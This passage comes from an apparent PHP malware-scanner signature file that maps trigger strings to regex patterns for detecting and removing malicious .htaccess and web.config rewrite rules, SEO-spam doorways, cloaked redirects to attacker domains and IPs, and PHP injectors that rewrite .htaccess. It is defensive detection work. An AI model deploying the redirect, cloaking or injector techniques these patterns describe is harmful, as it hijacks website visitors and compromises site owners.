				'RewriteRule ^shop/(.*)$ themes/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway-rewrite.008', 'RewriteCond %\{THE_REQUEST\} \^\[\^.\]\*.index..php \[NC\][\s]*RewriteCond %\{THE_REQUEST\} \^GET[\s]*Rewrite[^\]]+L\][\s]*\*?RewriteRule \^shop...... themes[^\]]+L\]\*?'),
			),

			'deny from all' => array(STR_TRIGGER,
				'?key=5ed88d80c7ee4458c3714a64ef5203b4' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.035', 'RewriteEngine On[\s]*RewriteBase .[\s]*order deny,[\s]*allow[\s]*deny from all[\s]*(allow from [\d\.]+[\s]*)+(ErrorDocument[\s]*[\d]+[\s]*https?:[^\n]+\?key=5ed88[^\n]+[\s]*)+(RewriteCond[\s]*%\{[^\n]+!-[\w][\s]*)+RewriteRule \^\(\.\*\)[\s]*index[^\n]+'),
			),

			']+)\/.*=.*\/$ ?$' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.011', 'RewriteRule\s*\^\(\[[^\+]+\+\)..\(.[^0]+0-9\]\+\)[^\.]+\.\*..[^\$]+\$\s*\?\$[123]{1}\$[123]{1}=\$[1234]{1}&%\{QUERY_STRING}\[L\]'),
			'file.php?$1=$2-$3 [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.003.06', '<IfModule mod_rewrite.c>[\s]*RewriteEngine On[\s]*RewriteRule \^\(\[a-zA-Z0-9\]\+\)[^$]+\$[\s]*file\.php\?\$1=\$2-\$3 \[L\][^<]+RewriteRule[^\[]+\[L\][^<]+<.IfModule>'),
			'index.php?smsite=$1&smid=$3&smtemp=$2 [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.005', 'RewriteRule \^\(?\[a-z[^\n]+\?smsite=\$1&smid=\$3&smtemp=\$2\s*?\[L\]\s*'),
			'.html$ index.php?tempweb=$1&smid=$2' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.doorway.006', 'RewriteRule\s+?\^\[a-zA-Z0-9\]\{3\}\(\[a-zA-Z0-9\]\{[^\.]+?\.html\$ index\.php\?tempweb=\$1&smid=\$2 \[L\]'),
			'RewriteCond %{HTTP_USER_AGENT} google [OR]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.010', 'RewriteEngine\s*On\s*RewriteCond\s*\%\{HTTP_USER_AGENT\}\s*google\s*\[OR\]\s*RewriteCond\s*\%\{HTTP_REFERER\}\s*google\s*(RewriteCond %\{REQUEST_URI[^\n]+[\s]*)*RewriteRule \^\.\*\$[\s]*[\w]+.php[\s]*\[L\]'),
			'^google(.*)\.html' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.google_verification.002', 'RewriteRule \^google\(\.\*\)\\\.html\$?[^\?]+\?(google|gg)=\$1 *\[\w+\]'),
			'RewriteRule ^(.*)-(.*)\.html$ ' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.google_verification.003', 'RewriteRule \^\(\.\*\)-\(\.\*\)\\\.html\$?[^\?]+\?(google|gg|uu)=\$1-\$2[^}]+\} *\[\w+\]'),
			'/(.*)$ exploitation-ddene.php [QSA,L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.011', 'RewriteEngine [Oo]n\nRewriteRule\s+?\^\d+?\/\(\.\*\)\$\s*?exploitation-ddene\.php \[QSA,L\](?:\s*?RewriteEngine On\s*?(?=\n\n#))?'),
			'*$ ?$2$3=$4&%{QUERY_STRING}[L]' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.doorway.003.10', 'RewriteRule \^\(\.\*\)[^\s]+\$[\s]*\?\$[\d]\$[\d]=\$[\d]\&\%\{QUERY_STRING\}\[L\]'),
			'$ ?$2$1=$3&%{QUERY_STRING}[L]' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.doorway.003.11', 'RewriteRule[^\n]+\?\$[\d]+\$[\d]+=\$[\d]+\&\%\{QUERY_STRING\}\[L\]'),
			'$ ?$1$3=$2&%{QUERY_STRING}[L]' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.doorway.003.12', 'RewriteRule \^\([^\n]+\$[\d]+&%\{QUERY_STRING\}\[L\]'),
			'RewriteRule \^[\\\\\/]*\(([\w]+)\)[\\\\\/]*\(\[0-9\]\+\)[^\{]+\$[\s]+\?\1\$[\d]=\$[\d]&%\{QUERY_STRING\}\[L\]' => array(REX_CLEAR_MULTIMATCH, 'rex.spam-seo.redirect.018', 'RewriteRule \^[\\\\\/]*\(([\w]+)\)[\\\\\/]*\(\[0-9\]\+\)[^\{]+\$[\s]+\?\1\$[\d]=\$[\d]&%\{QUERY_STRING\}\[L\](?:\s*RewriteRule\s+\^\((?:\.\*\)..\()?(?:\[0-9|\[\^.d..\]\+)[^\}]+?\}\[L\]\s*)*'),
			'RewriteRule \^[\d]{6,}.\(\.\*\)\$[\s]*[^[]+\.php[\s]*\[QSA,L\]' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.suspicious-rewrite.003', 'RewriteEngine on[\s]*RewriteRule \^[\d]{6,}.\(\.\*\)\$[\s]*[^[]+\.php[\s]*\[QSA,L\]'), 
			'RewriteRule ^([A-Za-z0-9-]+).html$' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.050', 'RewriteEngine On[\s]*RewriteRule \^\(\[A-Za-z0-9-\]\+\)\.html\$[^\]\n]+L\]'),
			'RewriteRule ^(.*).html$' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.051', 'RewriteEngine On[\s]*RewriteRule \^\(\.\*\)\.html\$ [\w_-]+\.php\?[^\]]+L\]'),
			'getyourprizenow' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.054', 'RewriteRule \^[^\n]+getyourprizenow\.[^\n]+L\]'),
			'RewriteRule ^.+\.txt$ https://bit.ly' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.057', 'RewriteEngine [oO]n[\s]*(RewriteRule[^\n]+bit\.ly[^\n]+[\s]*)+(RewriteCond[^\n]+[\s]*)*RewriteRule[^\n]+bit\.ly[^\n]+'),
		),

		'/go.php?sid=' => array(STR_TRIGGER,
			'if (strstr($old, \'RewriteRule' => array(STR_CLEARFILE, 'php.spam-seo.redirect_gen.007', NULL),
			'/go.php?sid=' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.007', 'RewriteEngine [oO]n[\s]*(RewriteBase[^\n]*[\s]*)?(RewriteCond[^\n]+[\s]*)+RewriteRule[^\n]+go\.php\?sid[^\]]+\]'),
		),

		')([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]' => array(STR_TRIGGER,
			'RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.003.02', '(RewriteRule \^(\.\*(-|\\\\.))?((\(\[0-9\]\+\))|(\(\[\^.d..\]\+\)))[^\$]+\$[\s]*\?\$[\d]+\$[\d]+=\$[\d]+&%\{QUERY_STRING\}\[L\][\s]*){3,}'), //modified by PG to clear malware completely and cover more variants
		),

		'seznam' => array(STR_TRIGGER,
			'redirect.php?' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.007', 'RewriteCond\s*\%\{HTTP_REFERER\}\s*\((google|aol|yahoo|msn|bing|\|)+[^\n]+\s*RewriteRule[^\]]+(viagra|pharmacy)\s*\[[^\]]+\]'),
		),

		'RewriteCond %{REQUEST_URI} !/(cc)\.php [NC]' => array(STR_TRIGGER,
			'RewriteCond %{REQUEST_URI} !/(ss)\.php [NC]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.049', 'RewriteEngine [Oo]n[\s]*RewriteCond %\{REQUEST_URI\}[\s]*!\^[^\n]+[\s]*RewriteCond %\{REQUEST_URI\}[\s]*!.\(cc\).\.php \[NC[^:]+RewriteRule[\s]*\.\*[\s]*http[^\n]+\[L,R=[\d]+\]'),
		),

		'futility-few.php' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect_gen.031', 'RewriteRule\s+?.\d+?\/\(\.\*\)\$\ futility-few\.php\s*?\[[^\]]+?\]'),
		'DirectoryIndex indoxploit' => array(STR_CLEAR_MULTIMATCH, 'htaccess.hacktool.symlink-viewer.003', 'Options Indexes FollowSymLinks[\s]*DirectoryIndex indoxploit[^{]+RewriteCond[\s]*%\{REQUEST_FILENAME\}[^\]]+\][\s]*RewriteRule ..txt\$[\s]*%\{REQUEST_URI\}[^\[]+\[L,R=[\d]+\.NC\]'),
		'(?<=RewriteRule\s\.\s\/index\.php\s\[L\]\s)RewriteRule\s*\^\(\[0-9\]\+\).\/\(\w+\).\/\(\[0-9\]\+\)_\(\.\*\)\.html\$\s*\?\w+\$\d=\$\d\&\%{QUERY_STRING}\[L\](?=\s<\/IfModule>)' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.suspicious-rewrite.005', '(?<=RewriteRule\s\.\s\/index\.php\s\[L\]\s)RewriteRule\s*\^\(\[0-9\]\+\).\/\(\w+\).\/\(\[0-9\]\+\)_\(\.\*\)\.html\$\s*\?\w+\$\d=\$\d\&\%{QUERY_STRING}\[L\](?=\s<\/IfModule>)'),
		'http://osta-x.ru' => array(STR_CLEARFILE, 'htaccess.spam-seo.redirect_gen.024', NULL),
		'/safezone' => array(STR_CLEAR_MULTIMATCH, 'htaccess.malware.safezone.001', 'RewriteCond[^\]]+android.\s*.NC.[^R]+RewriteRule.\^\(\.\*\)\$\s*http:..([0-9]{1,3}.){4}safezone[^\]]+30[1-2]\]'),
		'BrowserCheck' => array(STR_CLEAR_MULTIMATCH, 'htaccess.malware.browsercheck.001', 'RewriteCond[^\]]+android.\s*.NC.[^R]+RewriteRule.\^\(\.\*\)\$\s*http:..([0-9]{1,3}.){4}BrowserCheck[^\]]+30[1-2]\]'),
		'RewriteRule ^(.*)$ http://194.6.233' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.016.02', 'RewriteEngine on\s*RewriteCond [^\[\*]+MSIE\|[^"]+?" \[\w+\]\s*RewriteRule \^....\$ http:..194.6.233.\d\/[^\[]+\[[^\[]+?\]'),
	),

	'%{HTTP_USER_AGENT}' => array(STR_TRIGGER,

		'RewriteCond\s*\%{HTTP_USER_AGENT}\s*\((bing\||yahoo\||google\|)+[^\)]+\)\s*\[' => array(REX_TRIGGER,

			'RewriteCond %{HTTP_REFERER} (' => array(STR_TRIGGER,
				'RewriteCond %{HTTP_USER_AGENT} (' => array(STR_TRIGGER,
					'(RewriteCond %\{HTTP_[\w]+\} \(((bing|google|yahoo|msn|aol)\|){3,}[^\n]*[\s]*){2,}(RewriteCond %[^\n]+[\s]*)*RewriteRule[^\n]+L\][\s]*' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.053', '(RewriteCond %\{HTTP_[\w]+\} \(((bing|google|yahoo|msn|aol)\|){3,}[^\n]*[\s]*){2,}(RewriteCond %[^\n]+[\s]*)*RewriteRule[^\n]+L\][\s]*'),
				),
			),

			'$enc1 = $enc2 = $enc3 = $enc4 = "";' => array(STR_TRIGGER,
				'touch($htaccess_path, time() - mt_rand(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.186', '\$localpath = getenv\(.SCRIPT_NAME.\);\s*\$absolutepath = getenv[^;]+;[\s]*\$root_path = substr\(\$absolutepath,\s*\d*,\s*strpos\(\$absolutepath[^\n]+file_put_contents[^\}]+\}[^@]+enc3 = \$enc4 = "";\s*\}\s*while[^\}]+return \$output;\s*\}'),
			),

			'str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing)' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.254', '(\$\w+)\s*=\s*getenv\(.SCRIPT_NAME.\)\s*;\s*(\$\w+)\s*=\s*getenv\(.SCRIPT_FILENAME.\)\s*;\s*(\$\w+)\s*=\s*substr\(\s*\2\s*,\s*\d\s*,\s*strpos\(\2,\s*\1\s*\)\s*\)\s*;\s*(\$\w+)\s*=\s*\3\.\s*.\/\w+\.php.\s*;\s*if\(\!file_exists\(\4\)\s*\|\|\s*file_exists\(\4\)[^{]+{\s*file_put_contents\(\4\s*,\s*base64_decode\(.[^}]+}\s*(\$\w+)\s*=[^{]+{HTTP_USER_AGENT}\s*\([googlebingyahoomsnaol\|]{0,26}\)[^{]+{HTTP_REFERER}\s*\([googlebingyahoomsnaol\|]{0,26}\)[^{]+{HTTP_USER_AGENT}\s*\([googlebingyahoomsnaol\|]{0,26}\)[^\2]+touch\(\5\w+,\s*time\(\)\s*-\s*mt_rand[^;]+;\s*touch\(dirname\(\5\w+\),\s*time\(\)[^}]+}'),
			'RewriteRule ^.*$ index.php [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.006.02', 'RewriteCond %.HTTP_USER_AGENT. .google.yahoo.msn.aol.bing. .OR.[\\s]*RewriteCond[^)]+bing.[\\s]*RewriteRule[^\\]]+L]'),
			'RewriteCond\s*\%{HTTP_USER_AGENT}\s*\((bing\||yahoo\||google\|)+[^\)]+\)\s*\[(NC|OR),(NC|OR)\]\s*RewriteCond\s*\%{HTTP_REFERER}\s*\((bing\||yahoo\||google\|)+[^\)]+\)\s*RewriteRule\s*\^\(\.\*\)\$\s*\w+\.\w+\s*\[L,QSA\]' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.022', 'RewriteCond\s*\%{HTTP_USER_AGENT}\s*\((bing\||yahoo\||google\|)+[^\)]+\)\s*\[(NC|OR),(NC|OR)\]\s*RewriteCond\s*\%{HTTP_REFERER}\s*\((bing\||yahoo\||google\|)+[^\)]+\)\s*RewriteRule\s*\^\(\.\*\)\$\s*\w+\.\w+\s*\[L,QSA\]'),
			'RewriteRule ^(.*)$ default.php?$1 [L,QSA]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.033', '(RewriteCond[\s]*%\{[^\n]+[\s]*)+RewriteRule \^\(\.\*\)\$[\s]*default\.php\?\$[^\]]+QSA\]'),
			'RewriteRule . default.php [L,S=10000]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.055', 'RewriteBase.\/\s+RewriteCond.\%\{HTTP_\w+\}.\(\w+\|\w+\|\w+\|\w+\|\w+\).\[[^\n]*\s+RewriteCond.\%\{HTTP_REFERER\}.\(\w+\|\w+\|\w+\|\w+\|\w+\)\s+RewriteRule.\..\w+.php.\[L,S=\d+\]'),
		),

		'RewriteCond %{HTTP_USER_AGENT} IEMobile [OR]' => array(STR_TRIGGER,
			'RewriteCond %{HTTP_USER_AGENT} Googlebot [OR]' => array(STR_TRIGGER,
				'RewriteCond %{HTTP_USER_AGENT} BingBot [OR]' => array(STR_TRIGGER,
					'RewriteRule !.php$ http' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.041', 'RewriteEngine On[\s]*(RewriteCond %\{(HTTP_USER_AGENT|REQUEST_URI)\}[^\n]+[\s]*)+RewriteRule !\.php\$ http[^]]+\[L,[^\]]+\][\s]*'),
				),
			),
		),

		'RewriteCond %{HTTP_USER_AGENT} (google|yahoo' => array(STR_TRIGGER,
			'RewriteEngine On[\s]*(RewriteCond %\{REQUEST_METHOD\} GET[\s]*)?RewriteCond %\{HTTP_USER_AGENT\} \(google\|yahoo' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.018', '(RewriteCond %\{REQUEST_METHOD\} GET[\s]*)?RewriteCond %\{HTTP_USER_AGENT\} \(google\|yahoo[^\n]+[\s]*(Rewrite(Cond|Base)[^\n]+[\s]*)*(ErrorDocument[^\n]+)?[\n]+[\s]*RewriteRule[^\n]+\]'),
		),

		'RewriteCond %.HTTP_USER_AGENT}.{300,}\[NC,OR\][\s]*RewriteCond %.HTTP_USER_AGENT} \^.{1000,}\[NC\][\s]*RewriteRule \^\$ http[^,]+\[R,L\]' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.040', 'RewriteCond %.HTTP_USER_AGENT}.{300,}\[NC,OR\][\s]*RewriteCond %.HTTP_USER_AGENT} \^.{1000,}\[NC\][\s]*RewriteRule \^\$ http[^,]+\[R,L\]'),
	),

	'add input="{' => array(STR_TRIGGER,
		'action type="Rewrite" url=' => array(STR_TRIGGER,
			'input="{HTTP_USER_AGENT}" pattern="(bing' => array(STR_TRIGGER,

				'<\?xml version[^>]+>[\s]*<configuration>[\s]*<system\.webServer>[\s]*<rewrite>[\s]*<rules>[\s]*<rule name[^>]+>[\s]*<match url[^>]+>[\s]*<conditions[^>]+>[\s]*<add input' => array(REX_TRIGGER,
					'aol)" ignoreCase="true' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.web_config-redirect.001', '<rule name[^>]+>[\s]*<match url[^>]+>[\s]*<conditions[^>]+>[\s]*(<add input[\s]*=[\s]*.\{HTTP_[^\}]+\}.[\s]*pattern[\s]*=.[^>]+bing[^>]+>[\s]*)+<.conditions>[\s]*<action[^>]+>[\s]*<.rule>'),
				),

				'aol)" ignoreCase' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.web_config-redirect.001.02', '<rewrite>[\s]*<rules>[\s]*<rule name[^>]+>[\s]*<match url[^>]+>[\s]*<conditions[^>]+>[\s]*(<add input[\s]*=[\s]*.\{HTTP_[^\}]+\}.[\s]*pattern[\s]*=.[^>]+bing[^>]+>[\s]*)+<.conditions>[\s]*<action[^>]+>[\s]*<.rule>[\s]*<.rules>[\s]*<.rewrite>'),
			),
		),
	),

	'RewriteCond %{HTTP_USER_AGENT} android' => array(STR_TRIGGER,

		'RewriteCond %{HTTP_USER_AGENT} ^(1207' => array(STR_TRIGGER,
			'/top/top' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.004', 'RewriteCond %{HTTP_USER_AGENT} android\\|[^\\[]+\\[NC,OR\\][\\s]*RewriteCond %{HTTP_USER_AGENT} \\^\\(1207\\|[^N]+\\[NC\\][\\s]*RewriteRule [^\\[]+top.top[\\d]*.php \\[R=302,L\\]'),
		),

		'RewriteRule ^$ http://crazytds.club' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.030', 'RewriteEngine On[\s]*RewriteBase \/[\s]*(RewriteCond %\{HTTP_USER_AGENT\}[^\n]+\][\s]*)+RewriteRule \^\$ http:..crazytds\.club[^\]]+R,L\]'),
	),

	')\.html$ wp-content/' => array(STR_TRIGGER,
		'google(.*)\.html$ wp-content/' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.google_verification.001', 'RewriteRule \^.+?google\(\.\*\)..html\$ wp-content\/[^\[]+\[L\]'),
		'([0-9]+)\.html$ wp-content/' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.wp_content_rewrite.001', 'RewriteRule \^.+\)-\(\[0-9\]\+\)..html\$ wp-content\/\w+\.php\?\w+=\$\d[^\[]+\[L\]'),
	),

	'doctorceme.ru' => array(STR_TRIGGER,
		'404 http://doctorceme.ru' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doctorceme_ru_redirect.001.02', '(ErrorDocument \d\d\d http:..doctorceme.ru\/\s*)+(Options -Indexes\s*RewriteEngine On\s*(RewriteCond %.HTTP_REFERER. .\*\w+\.\*\$ \[NC(,OR)?\]\s*)+RewriteRule \.\* http:..doctorceme.ru\/ \[R,L\])?'),
		'doctorceme.ru/ [R,L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doctorceme_ru_redirect.001', 'Options -Indexes\s*RewriteEngine On\s*(RewriteCond %.HTTP_REFERER. .\*\w+\.\*\$ \[NC(,OR)?\]\s*)+RewriteRule \.\* http:..doctorceme.ru\/ \[R,L\](\s*(ErrorDocument \d\d\d http:..doctorceme.ru\/\s*)+)?'),
	),

	'wp-404.php' => array(STR_TRIGGER,
		'*) wp-404.php' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.wp-404.001', 'RewriteEngine On\s*(DirectoryIndex wp-404.php\s*)?RewriteC[^\(]+?RewriteRule \^\(\.\*\) wp-404.php'),
		')$ wp-404.php' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.wp-404.002', 'RewriteEngine On\s*(DirectoryIndex wp-404.php\s*)?RewriteCond %.REQUEST_FILENAME. \!-f\s*RewriteCond %.REQUEST_FILENAME. \!-d\s*RewriteRule \^[^\$]+\$ wp-404.php'),
	),

	'RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]' => array(STR_TRIGGER,
		'RewriteRule ^(.*)$ http://mobile.googleadservices.at [L,R=302]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.googleadservices_at.001', 'RewriteEngine on\s*RewriteCond %.HTTP_ACCEPT. "text.vnd[^:]+?RewriteRule \^\(\.\*\)\$ http:..\w+.googleadservices.at \[L,R=302\]'),
		'RewriteEngine On[\s]*RewriteCond %\{HTTP_ACCEPT\} "text.vnd.wap.wml\|application.vnd.wap.xhtml\+xml" \[NC,OR\][\s]*(RewriteCond %\{H[^\n]+\][\s]*){2,}RewriteRule \^\(\.\*\)\$ http[^\]]+\]' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.036', 'RewriteEngine On[\s]*RewriteCond %\{HTTP_ACCEPT\} "text.vnd.wap.wml\|application.vnd.wap.xhtml\+xml" \[NC,OR\][\s]*(RewriteCond %\{H[^\n]+\][\s]*){2,}RewriteRule \^\(\.\*\)\$ http[^\]]+\]'),
	),

	'fopen("' => array(STR_TRIGGER,
		'if (file_exists(' => array(STR_TRIGGER,
			'unlink' => array(STR_TRIGGER,
				'fopen\s*\(("|\')[(\$dir\/\.)]+htaccess("|\')\s*,\s*("|\')w("|\')\s*\)\s*;' => array(REX_CLEARFILE, 'php.spam-seo.rewriter.002.02', NULL), //updated to cover a new sample variant - luke
			),
		),
	),

	'mkdir("$dirname", 0777);' => array(STR_TRIGGER,
		'fwrite ($out, "RewriteEngine On' => array(STR_TRIGGER,
			'unlink($scriptname);' => array(STR_TRIGGER,
				'echo "<b><b><b>http://".$_SERVER[\'SERVER_NAME\']."/$dirname</b></b></b>";' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.044', NULL),

			),
		),
	),

	'RewriteCond %{ENV:REDIRECT_STATUS} 200' => array(STR_TRIGGER,
		'RewriteCond %{HTTP_USER_AGENT}' => array(STR_TRIGGER,
			'RewriteCond %{HTTP_REFERER}' => array(STR_TRIGGER,
				'RewriteRule ^(' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.002', 'RewriteCond %{ENV:REDIRECT_STATUS} 200[\s]*RewriteRule \^ - \[L\][\s]*(RewriteCond %\{REQUEST_FILENAME[^\n]+[\s]*)*(RewriteCond %\{HTTP_[^\n]+[\s]*)+RewriteRule \^[^\n]+\.php\?[^\n]+\[L\]'),
			),
		),
	),

	'%{HTTP_USER_AGENT} android|avantgo' => array(STR_TRIGGER,
		'your|zeto|zte\-) [NC]' => array(STR_TRIGGER,
			'RewriteRule ^$ http://' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.07', 'RewriteCond ..HTTP_USER_AGENT. android.avantgo[^\n]+xiino .NC,OR]\s*RewriteCond ..HTTP_USER_AGENT....1207.6310[^\n]+zte.-\) \[NC]\s*RewriteRule \^\$ http:..[\w\.]+\/[\w\.\/\?=]+ \[R,\s*L\]'),
		),
	),

	'RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?http://safebrowsing-cache.google.com/.*$ [NC]' => array(STR_TRIGGER,
		'deny from 173.194.' => array(STR_TRIGGER,
			'deny from google.com' => array(STR_CLEARFILE, 'htaccess.phishing.block_bots.001.02', NULL),
		),
	),

	'RewriteRule ^list.xml$' => array(STR_TRIGGER,
		'RewriteRule ^goose-(.*).html$' => array(STR_CLEARFILE, 'htaccess.spam-seo.doorway-rewrite.002', NULL),
	),

	'BEGIN SYSTEM API' => array(STR_TRIGGER,
		'myclearcode' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.clearcode.001', '#\s*BEGIN\s*SYSTEM\s*API[^#]+RewriteCond[^#]+myclearcode\$[^#]+#\s*END\s*SYSTEM\s*API'),
	),

	'DirectoryIndex cache.managed.php' => array(STR_TRIGGER,
		'chmod($dir."/cache.managed.php", 0777);' => array(STR_CLEARFILE, 'php.spam-seo.cache_managed.001', NULL),
	),

	'.%{ENV:SITE_WEB_SCRIPT_EXECUTE}?main-' => array(STR_TRIGGER,
		'check-script-vorking)' => array(STR_CLEARFILE, 'htaccess.backdoor.script_execute.001', NULL),
	),

	'^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.012', '<IfModule prefork\.c>[\s]*RewriteEngine On[\s]*RewriteCond %\{REQUEST_METHOD\}[\s]*\^GET\$[\s]*RewriteCond %\{HTTP_REFERER\}[\s]*\^\(http[^\n]+[\s]*(RewriteCond %\{HTTP_[^\n]+[\s]*){5,}RewriteCond %\{REQUEST_FILENAME[^<]+<.IfModule>[\s]*(#[\w]+[\s]*)?'),
	'RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001', 'RewriteCond\s*\%.HTTP_USER_AGENT.\s*((\^\w\w\w{1,}\.\*\|)|(\.\*\w\w\w{1,}\.\*\|))+[^\]]+NC[^\%]+RewriteCond\s*..HTTP_ACCEPT[^\%]+(..HTTP[^\%]+)+UA-pixels[^\]]+RewriteRule[^\]]+http...[^\]]+L,R=(302|301)\]'),
	'RewriteRule (.*) /phpinfo.php' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.02', '<IfModule[^<]* \/phpinfo.php\?query[^<]*<.IfModule>'),
	'RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.03', '<IfModule mod_rewrite[^<]*RewriteCond .{HTTP_REFERER} .http[^<]*..IfModule>'),
	'RewriteRule ^(.*)$ http://gerania.r' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.04', '########GET#######[\s]*(Rewrite[^\n]+[\s]*)+RewriteRule[^\n]+gerania.ru[\s]*\[[^\n]+\][\s]*'),
	'http://trusted-online-casinos2014.com  [R=301,L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.06', '<IfModule\s*mod_rewrite.c>[^>]+RewriteEngine\s*On[^>]+RewriteCond[^>]+RewriteRule[^>]+trusted-online-casinos2014.com[^>]+IfModule>'),
	'jpartner.org [L,R=302]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.002', '########GET#######[\\s]*RewriteEngine on[\\s]*(?:RewriteCond[^\\n]+][\\s]*)+RewriteRule........http...jpartner.org .L,R=302]'),
	'RewriteRule ^(.*)$ http://coding-paradise.ru' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.08', '[\\s]+########GET#######[\\s]*RewriteEngine on[\\s]*(RewriteCond %.HTTP_[^\\n]+[\\s]*)+RewriteRule .....\\$ http:..coding-paradise.ru .L,R=302.'),
	'hostedd.ru [L,R=302]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.002.02', '########GET#######[\\s]*RewriteEngine on[\\s]*RewriteRule[^]]+][\\s]*(?:RewriteCond[^\\n]+][\\s]*)+RewriteRule........http...hostedd.ru .L,R=302]'),
	'mob-update.ru' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.rediret.001.010', '\{HTTP_USER_AGENT\}\n.Android[^,]+RewriteRule[^,]+mob-update.ru[^\n]+=302'),
	'updatemaster.net' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.rediret.001.011', '\{HTTP_USER_AGENT\}\n.Android[^,]+RewriteRule[^,]+updatemaster.net[^\n]+=302'),
	'/safezone [L,R=302]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.malware.safezone.002', 'RewriteEngine on[\\s]*RewriteCond ..HTTP_USER_AGENT. "[\\w|]+"[\\s]*.NC.[\\s]*RewriteRule ...... http...[\\d]+.[\\d]+.[\\d]+.[\\d]+.safezone .L,R=302.'),
	'.cgi?default [L,R=302]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.013.05', 'RewriteEngine on[\s]*RewriteCond %\{HTTP_USER_AGENT\} "[^"]+"[\s]*\[NC\][\s]*RewriteRule \^\(\.\*\)\$[\s]*http[^\[]+\.cgi\?default[\s]*\[L,R=302\]'),
	'185.93.187.90/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.malware.185_93_187_90.001', 'RewriteCond %.HTTP_USER_AGENT. .Android.MSIE.Trident.Edge. .NC.\s*RewriteRule \S+ http:..185.93.187.90\/(\w+)? .L,R=302\]'),
	'aspx\?jumpid=0sichm [NC]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.005', 'RewriteEngine On[\\s]*RewriteCond %.HTTP_REFERER. \\([^\\)]+\\) \\[NC][\\s]*RewriteRule . http:[^=]+jumpid=0sichm \\[NC]'),
